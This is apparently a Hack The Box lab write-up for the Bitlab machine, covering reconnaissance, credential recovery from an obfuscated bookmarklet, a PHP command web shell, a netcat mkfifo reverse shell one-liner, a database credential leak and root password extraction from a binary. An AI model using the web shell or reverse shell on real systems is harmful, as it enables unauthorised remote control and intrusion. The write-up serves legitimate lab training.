Hey guys. This is Chan, and today I am going to write up Bitlab from Hack The Box.

Sorry for being late with this write-up; I had exams at school recently.
So let's start.
Bitlab is a medium Linux machine. I added the IP address 10.10.10.114 as bitlab.htb to /etc/hosts, so let's jump in.
Nmap
root@ch4n:~/Desktop/vpn# nmap -sC -sV bitlab.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-14 01:10 EST
Nmap scan report for bitlab.htb (10.10.10.114)
Host is up (0.26s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 a2:3b:b0:dd:28:91:bf:e8:f9:30:82:31:23:2f:92:18 (RSA)
|   256 e6:3b:fb:b3:7f:9a:35:a8:bd:d0:27:7b:25:d4:ed:dc (ECDSA)
|_  256 c9:54:3d:91:01:78:03:ab:16:14:6b:cc:f0:b7:3a:55 (ED25519)
80/tcp open  http    nginx
| http-robots.txt: 55 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://bitlab.htb/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.67 seconds
We got HTTP on port 80 and SSH on port 22, and a robots.txt in the nmap scan results.
Web page

GitLab is running on the web server on port 80, and it presents a GitLab login page, so we need credentials to log in.
So let's check the robots.txt from our initial nmap scan.
# See http://www.robotstxt.org/robotstxt.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow: /

# Add a 1 second delay between successive requests to the same server, limits resources used by crawler
# Only some crawlers respect this setting, e.g. Googlebot does not
# Crawl-delay: 1

# Based on details in https://gitlab.com/gitlab-org/gitlab-ce/blob/master/config/routes.rb, https://gitlab.com/gitlab-org/gitlab-ce/blob/master/spec/routing, and using application
User-Agent: *
Disallow: /autocomplete/users
Disallow: /search
Disallow: /api
Disallow: /admin
Disallow: /profile
Disallow: /dashboard
Disallow: /projects/new
Disallow: /groups/new
Disallow: /groups/*/edit
Disallow: /users
Disallow: /help
# Only specifically allow the Sign In page to avoid very ugly search results
Allow: /users/sign_in

# Global snippets
User-Agent: *
Disallow: /s/
Disallow: /snippets/new
Disallow: /snippets/*/edit
Disallow: /snippets/*/raw

# Project details
User-Agent: *
Disallow: /*/*.git
Disallow: /*/*/fork/new
Disallow: /*/*/repository/archive*
Disallow: /*/*/activity
Disallow: /*/*/new
Disallow: /*/*/edit
Disallow: /*/*/raw
Disallow: /*/*/blame
Disallow: /*/*/commits/*/*
Disallow: /*/*/commit/*.patch
Disallow: /*/*/commit/*.diff
Disallow: /*/*/compare
Disallow: /*/*/branches/new
Disallow: /*/*/tags/new
Disallow: /*/*/network
Disallow: /*/*/graphs
Disallow: /*/*/milestones/new
Disallow: /*/*/milestones/*/edit
Disallow: /*/*/issues/new
Disallow: /*/*/issues/*/edit
Disallow: /*/*/merge_requests/new
Disallow: /*/*/merge_requests/*.patch
Disallow: /*/*/merge_requests/*.diff
Disallow: /*/*/merge_requests/*/edit
Disallow: /*/*/merge_requests/*/diffs
Disallow: /*/*/project_members/import
Disallow: /*/*/labels/new
Disallow: /*/*/labels/*/edit
Disallow: /*/*/wikis/*/edit
Disallow: /*/*/snippets/new
Disallow: /*/*/snippets/*/edit
Disallow: /*/*/snippets/*/raw
Disallow: /*/*/deploy_keys
Disallow: /*/*/hooks
Disallow: /*/*/services
Disallow: /*/*/protected_branches
Disallow: /*/*/uploads/
Disallow: /*/-/group_members
Disallow: /*/project_members
Here we can see a lot of disallowed directories.
So let’s scan with gobuster.
root@ch4n:~# gobuster dir -u http://10.10.10.114 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.114
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/01/13 16:08:02 Starting gobuster
===============================================================
Error: the server returns a status code that matches the provided options for non existing urls. http://10.10.10.114/85c08f62-d433-43da-ac48-37890d552cec => 302. To force processing of Wildcard responses, specify the '--wildcard' switch
When we ran gobuster we got an error. I opened http://10.10.10.114/85c08f62-d433-43da-ac48-37890d552cec in the browser and it redirected to the web page, which is the 302 that gobuster mentioned.
So I tried gobuster without 302 in the status code list, and then gobuster worked.
After running gobuster, we got a list of directories.
root@ch4n:~# gobuster dir -u http://10.10.10.114 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -s 200,204,301,307,401,403
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.114
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/01/13 16:10:53 Starting gobuster
===============================================================
/search (Status: 200)
/help (Status: 301)
/profile (Status: 301)
/public (Status: 200)
/root (Status: 200)
/explore (Status: 200)
/ci (Status: 301)

There was an interesting link called Gitlab Login:

When I clicked the link it did not respond, so I checked the page source, where there is an interesting piece of JS code:
<DT><A HREF="javascript:(function(){ var _0x4b18=["\x76\x61\x6C\x75\x65","\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6C\x61\x76\x65","\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64","\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78"];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5]; })()" ADD_DATE="1554932142">Gitlab Login</A>
</DL><p>
</DL><p>
So I modified the code to execute it in a JS console:
var _0x4b18=['\x76\x61\x6C\x75\x65','\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E','\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64','\x63\x6C\x61\x76\x65','\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64','\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78'];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5];
So I typed it like this in my terminal:
root@ch4n:~# js
> var _0x4b18=['\x76\x61\x6C\x75\x65','\x75\x73\x65\x72\x5F\x6C\x6F\x67\x69\x6E','\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64','\x63\x6C\x61\x76\x65','\x75\x73\x65\x72\x5F\x70\x61\x73\x73\x77\x6F\x72\x64','\x31\x31\x64\x65\x73\x30\x30\x38\x31\x78'];document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5];
Thrown:
ReferenceError: document is not defined
> _0x4b18
[ 'value', 'user_login', 'getElementById', 'clave', 'user_password', '11des0081x' ]
So we got the creds:
User – clave password – 11des0081x
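The same bookmarklet can be decoded statically, without a `document` object and without executing it at all. This is an added example, not code from the original write-up: it parses the hex-escaped string array, substitutes every `_0x4b18[n]` reference with the literal it stands for, and then reports which form fields the script would fill in. The input string below is constructed from the bookmarklet shown on the page.

```javascript
// Added example (not from the original write-up): statically decode the
// bookmarklet's string-array obfuscation instead of running it in a JS
// console. The pattern is one array of "\xNN"-escaped strings, with every
// string in the code referenced as _0xNAME[index]; we decode the escapes
// and substitute each reference with the literal it stands for.

// Constructed input: the two statements from the page's bookmarklet, with
// the same hex-escaped string array.
const BOOKMARKLET =
  'var _0x4b18=["\\x76\\x61\\x6C\\x75\\x65","\\x75\\x73\\x65\\x72\\x5F\\x6C\\x6F\\x67\\x69\\x6E",' +
  '"\\x67\\x65\\x74\\x45\\x6C\\x65\\x6D\\x65\\x6E\\x74\\x42\\x79\\x49\\x64","\\x63\\x6C\\x61\\x76\\x65",' +
  '"\\x75\\x73\\x65\\x72\\x5F\\x70\\x61\\x73\\x73\\x77\\x6F\\x72\\x64","\\x31\\x31\\x64\\x65\\x73\\x30\\x30\\x38\\x31\\x78"];' +
  'document[_0x4b18[2]](_0x4b18[1])[_0x4b18[0]]= _0x4b18[3];' +
  'document[_0x4b18[2]](_0x4b18[4])[_0x4b18[0]]= _0x4b18[5];';

// Turn "\xNN" escape sequences into the characters they encode.
function decodeHexEscapes(s) {
  return s.replace(/\\x([0-9a-fA-F]{2})/g, (_, hex) =>
    String.fromCharCode(parseInt(hex, 16)));
}

// Locate `var _0x....=[ "...", "..." ];`, decode its strings, and return
// the array name, the decoded strings and the code that follows the array.
function extractStringArray(src) {
  const m = src.match(/var\s+(_0x[0-9a-fA-F]+)\s*=\s*\[([^\]]*)\]\s*;/);
  if (!m) throw new Error('no obfuscation string array found');
  const items = m[2].match(/"[^"]*"|'[^']*'/g) || [];
  const strings = items.map((q) => decodeHexEscapes(q.slice(1, -1)));
  return { name: m[1], strings, rest: src.slice(m.index + m[0].length) };
}

// Rewrite every name[index] reference as the quoted literal it resolves to.
function deobfuscate(src) {
  const { name, strings, rest } = extractStringArray(src);
  const ref = new RegExp(name + '\\[(\\d+)\\]', 'g');
  const code = rest.replace(ref, (_, i) => JSON.stringify(strings[Number(i)]));
  return { strings, code };
}

// From the readable code, collect which form fields get pre-filled and with
// what: the behaviour a reviewer of such a bookmark actually needs to know.
function fieldAssignments(code) {
  const re = /document\["getElementById"\]\("([^"]+)"\)\["value"\]\s*=\s*"([^"]*)"/g;
  const out = {};
  let m;
  while ((m = re.exec(code)) !== null) out[m[1]] = m[2];
  return out;
}

console.log(deobfuscate(BOOKMARKLET).code);
console.log(fieldAssignments(deobfuscate(BOOKMARKLET).code));
```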
After logging in with these creds, I found two projects: profile and developer.



Here I created a simple cmd shell:
<?php system($_REQUEST['cmd']); ?>

Then I checked it with the whoami command; it worked, so let's grab a reverse shell.
I used this reverse shell from pentest monkey:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
Then I got a reverse shell as www-data:
root@ch4n:~/HTB/bitlab# nc -lnvp 1234
Connection from 10.10.10.114:40202
Linux bitlab 4.15.0-29-generic #31-Ubuntu SMP Tue Jul 17 15:39:52 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
 15:17:39 up 5 min,  0 users,  load average: 0.75, 0.79, 0.42
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@bitlab:/$ sudo -l
sudo -l
Matching Defaults entries for www-data on bitlab:
    env_reset, exempt_group=sudo, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bitlab:
    (root) NOPASSWD: /usr/bin/git pull
www-data@bitlab:/$
But I was not able to do anything useful with that, so I needed to try PostgreSQL.
php -r '$db_connection = pg_connect("host=localhost dbname=profiles user=profiles password=profiles");$result = pg_query($db_connection, "SELECT * FROM profiles");print_r(pg_fetch_all($result));'
Array
(
    [0] => Array
        (
            => 1
            => clave
            => c3NoLXN0cjBuZy1wQHNz==
        )
)
Then we got the user and password for SSH. I decoded this base64 string and tried to log in to SSH.
root@ch4n:~# echo -n c3NoLXN0cjBuZy1wQHNz==| base64 -d
ssh-str0ng-p@ssbase64: invalid input
It said that, so I decided to log in to SSH with this base64 string as it is, and it worked :-) and I grabbed user.txt.
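Why `base64 -d` printed the decoded text and then complained: the first 20 characters are a complete, unpadded encoding of `ssh-str0ng-p@ss`, and the trailing `==` is surplus padding that a strict decoder rejects. The stored value was never a canonical base64 string, which is why it works only when used verbatim. This added example (not code from the original write-up) reproduces that diagnosis and shows a round-trip check that tells a genuine encoding apart from a literal that merely looks like one; the stored value is taken from the page.

```javascript
// Added example (not from the original write-up): work out why
// `base64 -d` printed "ssh-str0ng-p@ss" followed by "invalid input" for the
// value in the profiles table, and test whether a string that merely looks
// like base64 is genuinely an encoding or just a literal ending in "==".

// Constructed input: the password column value shown in the write-up.
const STORED_VALUE = 'c3NoLXN0cjBuZy1wQHNz==';

// Mirror what a strict decoder such as GNU base64 enforces: alphabet only,
// and '=' padding exactly where the final 4-character group needs it.
function base64Diagnosis(s) {
  const body = s.replace(/=+$/, '');         // data characters, padding removed
  const pad = s.length - body.length;         // how many '=' were appended
  if (!/^[A-Za-z0-9+/]*$/.test(body)) {
    return { valid: false, reason: 'non-alphabet character' };
  }
  const needed = (4 - (body.length % 4)) % 4; // padding a canonical encoding has
  if (needed === 3) return { valid: false, reason: 'impossible group length' };
  if (pad !== needed) {
    return {
      valid: false,
      reason: `expected ${needed} padding char(s), found ${pad}`,
      // What a decoder emits before it trips over the surplus padding: this
      // is the "ssh-str0ng-p@ss" that appeared in front of the error message.
      decodedPrefix: Buffer.from(body, 'base64').toString('utf8'),
    };
  }
  return { valid: true, decoded: Buffer.from(s, 'base64').toString('utf8') };
}

// Round-trip check: a string is genuinely base64 only if decoding and
// re-encoding reproduces it exactly. Buffer.from() never throws on malformed
// input, so a bare decode would not reveal the problem; this does.
function isCanonicalBase64(s) {
  return Buffer.from(s, 'base64').toString('base64') === s;
}

console.log(base64Diagnosis(STORED_VALUE));
console.log(isCanonicalBase64(STORED_VALUE), isCanonicalBase64('c3NoLXN0cjBuZy1wQHNz'));
```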

Privilege escalation
clave@bitlab:~$ ls -la
total 44
drwxr-xr-x 4 clave clave  4096 Aug  8 14:40 .
drwxr-xr-x 3 root  root   4096 Feb 28  2019 ..
lrwxrwxrwx 1 root  root      9 Feb 28  2019 .bash_history -> /dev/null
-rw-r--r-- 1 clave clave  3771 Feb 28  2019 .bashrc
drwx------ 2 clave clave  4096 Aug  8 14:40 .cache
drwx------ 3 clave clave  4096 Aug  8 14:40 .gnupg
-rw-r--r-- 1 clave clave   807 Feb 28  2019 .profile
-r-------- 1 clave clave 13824 Jul 30 19:58 RemoteConnection.exe
-r-------- 1 clave clave    33 Feb 28  2019 user.txt
There is an interesting file called RemoteConnection.exe. I downloaded it to my machine, loaded it into the x32 debugger, set a breakpoint at "access denied", and got the SSH root password:

“-ssh root@gitlab.htb -pw \“Qf7]8YSV.wDNF*[7d?j&eD4^\”” \”Qf7]8YSV.wDNF*[7d?j&eD4^\””
After logging in to SSH as root with this password, we got root and grabbed the root flag :-)

That's it, guys.
Enjoy my write-up :-)
Author
CH4N